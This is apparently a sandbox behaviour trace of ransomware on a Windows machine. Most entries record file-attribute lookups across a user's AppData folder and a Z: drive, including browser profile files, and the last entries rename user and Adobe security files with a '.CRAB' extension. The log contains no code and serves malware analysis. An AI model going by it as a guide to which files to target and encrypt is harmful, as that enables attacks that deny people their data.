Get Info C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots type = file_attributes True 1
Fn
Get Info Z:\DR2HdhXM7A.xls type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf type = file_attributes True 1
Fn
Get Info Z:\0uoW8iDiO9C0q.jpg type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl type = file_attributes True 1
Fn
Get Info Z:\ctwtFUQdhyq9B0.flv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL type = file_attributes True 1
Fn
Get Info Z:\wwWTiMqjx6hY7AqmcQRC.rtf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL type = file_attributes True 1
Fn
Get Info Z:\ZluEZ8VfU.ppt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL type = file_attributes True 1
Fn
Get Info Z:\AeKHMJrNCDYUq.ots type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx type = file_attributes True 1
Fn
Get Info Z:\usc0a0c3QarsfV.docx type = file_attributes True 1
Fn
Get Info Z:\Ft1MOn1CIc.pdf type = file_attributes True 1
Fn
Get Info Z:\1taL0c72JXkGj.docx type = file_attributes True 1
Fn
Get Info Z:\EmullYJgNTq8y.odt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK type = file_attributes True 1
Fn
Get Info Z:\fJJNxlZPFcIOL7N8L.pps type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml type = file_attributes True 1
Fn
Get Info Z:\hjOwYAb7YQ2odlEyn.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm type = file_attributes True 1
Fn
Get Info Z:\ZcRis.ppt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx type = file_attributes True 1
Fn
Get Info Z:\pEtobMGPdVk4C2adw.csv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx type = file_attributes True 1
Fn
Get Info Z:\sEi0K8sZnqEl5.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx type = file_attributes True 1
Fn
Get Info Z:\oXr639hN3x86Bhd.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx type = file_attributes True 1
Fn
Get Info Z:\XmnJxoBkEp9WD4cyN.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx type = file_attributes True 1
Fn
Get Info Z:\KtzEQVEZQWFLdAY3Qn.odt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx type = file_attributes True 1
Fn
Get Info Z:\sbZAE.wav type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx type = file_attributes True 1
Fn
Get Info Z:\ukO9D2qllnBsxnQ.pptx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx type = file_attributes True 1
Fn
Get Info Z:\UsVrBfwU9tuC5KFqX2K.swf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx type = file_attributes True 1
Fn
Get Info Z:\gr07JV38A.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx type = file_attributes True 1
Fn
Get Info Z:\BhX74jJaOIdhyhcSe5G9.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx type = file_attributes True 1
Fn
Get Info Z:\xQ6SLR9y03J4ITfu7P.flv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx type = file_attributes True 1
Fn
Get Info Z:\4z3uag.rtf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx type = file_attributes True 1
Fn
Get Info Z:\BokNObz8UcZzwf.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx type = file_attributes True 1
Fn
Get Info Z:\rYZw8NqY13.ots type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx type = file_attributes True 1
Fn
Get Info Z:\Kn7qhmeLrMy5AdqLU92.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx type = file_attributes True 1
Fn
Get Info Z:\sDKhau.doc type = file_attributes True 1
Fn
Get Info Z:\8qGeXH1kIXTzNAwh1.pptx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx type = file_attributes True 1
Fn
Get Info Z:\991tuWIWnfwOaO.rtf type = file_attributes True 1
Fn
Get Info Z:\LOFKJdnEn4MzMXm.rtf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx type = file_attributes True 1
Fn
Get Info Z:\RH3IiU0yMrDFNR6DKs.pdf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx type = file_attributes True 1
Fn
Get Info Z:\iWJTz4KEmPveSMxUQ8.bmp type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox type = file_attributes True 1
Fn
Get Info Z:\qU7Og9CaR8xuh.rtf type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox type = file_attributes True 1
Fn
Get Info Z:\lEAREuPn69.mp4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox type = file_attributes True 1
Fn
Get Info Z:\qnnrT9SEOOv4oMd88.jpg type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl type = file_attributes True 1
Fn
Get Info Z:\eCV9B6Keul.docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl type = file_attributes True 1
Fn
Get Info Z:\pWw3Texk6CwVcTz.odp type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl type = file_attributes True 1
Fn
Get Info Z:\TkryzlAhWDjxy.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl type = file_attributes True 1
Fn
Get Info Z:\NXOcFmcZH0kfs1V2.xls type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl type = file_attributes True 1
Fn
Get Info Z:\cxc1c8A9xEZm1pp.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx type = file_attributes True 1
Fn
Get Info Z:\FsFwfuaCG.csv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx type = file_attributes True 1
Fn
Get Info Z:\1F9dzJR3Dq.wav type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx type = file_attributes True 1
Fn
Get Info Z:\o4isx.png type = file_attributes True 1
Fn
Get Info Z:\2XzzHT1hfS0s9l.docx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx type = file_attributes True 1
Fn
Get Info Z:\m9asRMP8HoSL6.avi type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4 type = file_attributes True 1
Fn
Get Info Z:\PlmVZkn.csv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite type = file_attributes True 1
Fn
Get Info Z:\D9xhD4Vtl9zeKaqi.mkv type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4 type = file_attributes True 1
Fn
Get Info Z:\diCHxx1R37p96mJV.ppt type = file_attributes True 1
Fn
Get Info Z:\8KdP1zVgyza2WB4YuYBy.gif type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite type = file_attributes True 1
Fn
Get Info Z:\9HqwEbX7Ln7H.wav type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info type = file_attributes True 1
Fn
Get Info Z:\9ZTbafp.mp3 type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib type = file_attributes True 1
Fn
Get Info Z:\EdkUgdunNhUsDwiV5VL.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite type = file_attributes True 1
Fn
Get Info Z:\RxFoEpC5uC.xlsx type = file_attributes False 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Move C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP.CRAB source_filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata True 1
Fn
Move C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl True 1
Fn
